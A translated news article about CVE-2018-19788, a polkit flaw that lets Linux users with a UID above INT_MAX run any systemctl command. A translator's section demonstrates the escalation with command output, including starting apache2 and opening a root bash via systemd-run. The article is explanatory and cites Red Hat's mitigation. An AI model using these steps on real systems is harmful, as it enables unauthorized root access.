Unprivileged Linux users with UID> INT_MAX can execute any command.

Original author: Mohit Kumar
  • Transfer
Sit down, I have news that now shocks you ...

There is an overt vulnerability in Linux operating systems that allows a user with low privileges to execute any systemctl command (and even become root - interpreter) if its UID is greater than 2147483647.


The described vulnerability, monitored as CVE-2018-19788, is in the PolicyKit library (also known as polkit ) version 0.115, pre-installed on most popular Linux distributions, including Red Hat, Debian, Ubuntu, and CentOS. Polkit is a tool in UNIX-like systems that is used to define policies and provide access to unprivileged processes to privileged ones. Unlike “sudo”, it does not give the user process administrative privileges, but allows you to precisely control what is allowed and what is prohibited.

The vulnerability exists due to an error in checking PolicyKit permission requests for any user with a UID greater than INT_MAX. Where INT_MAX is a constant that stores the maximum value of an integer integer variable, which is 2147483647 (in hexadecimal 0x7FFFFFFF).

Thus, if we create an account with any UID exceeding the INT_MAX value, the policyKit component will allow you to successfully execute any systemctl command.

Twitter security researcher Rich Mirch, who introduced himself as “ 0xm1rch, ” released a proof-of-concept (PoC) exploit to successfully demonstrate a vulnerability that requires a user with a UID of 4 billion.

Red Hat recommends that system administrators not allow any negative UID or UID greater than 2147483646 to mitigate the problem before the patch is released.

Several methods of operation from the translator

The first way is simply via systemctl. I created a user with a large UID, then tried to start apache2:

1) first I checked that it was lying

$ systemctl status apache2
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset:
  Drop-In: /lib/systemd/system/apache2.service.d
   Active: inactive (dead)

2) tried to run, but got an error

$ systemctl start apache2
(process:2820): GLib-GObject-WARNING **: 00:42:35.586: value "-2147483646" of type'gint' is invalid or out of range for property 'uid' of type'gint'
ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)

3) but then made sure that he still started

$ systemctl status apache2
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset:
  Drop-In: /lib/systemd/system/apache2.service.d
   Active: active (running) since Tue 2018-12-11 00:42:35 +04; 2s ago
  Process: 2825 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCE
 Main PID: 2829 (apache2)
    Tasks: 55 (limit: 4526)
   CGroup: /system.slice/apache2.service
           ├─2829 /usr/sbin/apache2 -k start
           ├─2830 /usr/sbin/apache2 -k start
           └─2831 /usr/sbin/apache2 -k start

The second way is to run bash through systemd. I executed the following command, created a text document in the root fs, added a line to it, and checked the result

$  systemd-run -t /bin/bash
(process:3947): GLib-GObject-WARNING **: 01:24:30.023: value "-2147483646" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
Running as unit: run-u107.service
Press ^] three times within 1s to disconnect TTY.
# echo hello > /test.txt
# cat /test.txt

While experimenting in my ubunt, I discovered another pattern: if you enter account settings under a user with such a UID, then all settings are unlocked, which allows you to edit / delete any users.

The question remains as to how to “cause” the appearance on the victim host of a user with such a UID, and does this bug really pose a threat?

Also popular now: